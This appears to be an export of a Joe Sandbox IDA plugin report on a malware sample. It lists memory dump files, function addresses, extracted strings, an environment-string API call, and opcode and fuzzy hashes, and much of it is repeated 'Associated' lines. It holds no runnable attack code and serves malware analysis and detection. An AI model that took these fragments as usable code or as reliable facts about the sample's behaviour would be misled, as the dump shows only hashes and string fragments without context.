Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +Ku$wpq
API String ID: 237503144-1953850642
Opcode ID: 15b73b30434c56d5a241355f81fc32258fb675b5c72ae9723cd60fb1bbb0a22e
Instruction ID: 363d3df28f91efd6392b186598720918df8187dbc31b40232e3301f5a7952290
Opcode Fuzzy Hash: 15b73b30434c56d5a241355f81fc32258fb675b5c72ae9723cd60fb1bbb0a22e
Instruction Fuzzy Hash: E151CE7221C3118FC324CF69984076FB7F6EBC5310F55892EE4AACB285DB30D50A8B92

Function 00987DA9 Relevance: 5.4, Strings: 4, Instructions: 421COMMON

Download Yara Rule

Strings

], xrefs: 0098824A
^, xrefs: 00988246
_, xrefs: 00988242
\, xrefs: 0098824E

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: \$]$^$_
API String ID: 0-1726580471
Opcode ID: 24ade3de7919a961f0908fa26371e4c0fdcbc14c5aa3cb2248197910d6fb9ad9
Instruction ID: 5545d3e489f1805d832534493940a48d4068def74430acf900d81f28e3d2ec73
Opcode Fuzzy Hash: 24ade3de7919a961f0908fa26371e4c0fdcbc14c5aa3cb2248197910d6fb9ad9
Instruction Fuzzy Hash: 48227C21508BD5CED326CB3C8848B497F911B67324F0E82D9D4E95F3F3C6A9894AC762

Function 009790D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00979170

Strings

M/(, xrefs: 0097913D
M/(, xrefs: 0097919E

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: M/($M/(
API String ID: 237503144-1710806632
Opcode ID: 9f82d21f30624f150f877135a342c7a2330156b902471aa929eb0cae355e67a5
Instruction ID: 348bf24bb53d9edc13921d79f2865bd8253880600da44d7cfff95d7ced83089b
Opcode Fuzzy Hash: 9f82d21f30624f150f877135a342c7a2330156b902471aa929eb0cae355e67a5
Instruction Fuzzy Hash: E621237165C3615FE714CE389881B9FF7AAEBC2700F11892CE0D5DB1C5D675880B8796

Function 0097C9EB Relevance: 5.2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

Strings

EXCm, xrefs: 0097C9FE
EXCm, xrefs: 0097C8F5
_^]\, xrefs: 0097CA6F
_^]\, xrefs: 0097C96F

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: EXCm$EXCm$_^]\$_^]\
API String ID: 0-1657758763
Opcode ID: 42e88368b94d32110d0fac09b9eecf4c14b7acef7028c499927ce4b43c8e4f9f
Instruction ID: 328f7a6f07a68ea694028547ef11f81310b1d681148bd38ed91c79eb27c8e7bf
Opcode Fuzzy Hash: 42e88368b94d32110d0fac09b9eecf4c14b7acef7028c499927ce4b43c8e4f9f
Instruction Fuzzy Hash: 1151D4B11046928BD769CF3A80A0773FBE2AF57301F1DC5ACC4DB9B652D630A985DB50

Function 0097A5B6 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

i, xrefs: 0097A527
i, xrefs: 0097A5CD
VN, xrefs: 0097A520
VN, xrefs: 0097A5C6

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: VN$VN$i$i
API String ID: 0-1885346908
Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
Instruction ID: d135aa8406a5d05a414bc7af16cefd4a5a82863b196157f3db19622714d1eea3
Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
Instruction Fuzzy Hash: B821002214C3418AD305CE7580402AFFBE7ABC6728F28865DE0F55F391E63BC9094757

Function 00989D30 Relevance: 4.3, Strings: 3, Instructions: 528COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00989F06, 0098A261
_^]\, xrefs: 00989D60
_^]\, xrefs: 00989F20

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: _^]\$_^]\$_^]\
API String ID: 0-3175222818
Opcode ID: 4b5cf63edc7e4f0f4ad2afe218e2579b08608537e81914427844d2e5475b837d
Instruction ID: 0ba4924e1b62ca9592319fe2336dd73c2a15c6e4cf3d7cf94a91cfdcd861ea3b
Opcode Fuzzy Hash: 4b5cf63edc7e4f0f4ad2afe218e2579b08608537e81914427844d2e5475b837d
Instruction Fuzzy Hash: 34D14676A0C3104BD714EE29CC8062BBB96EBC5714F298A2DE9E957396D730DC02C7C2

Function 00959780 Relevance: 4.2, Strings: 3, Instructions: 420COMMON

Download Yara Rule

Strings

A, xrefs: 00959922
DCB816FF7B9F128FBEBA0C6A975F1733, xrefs: 00959861
1, xrefs: 00959A7B

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
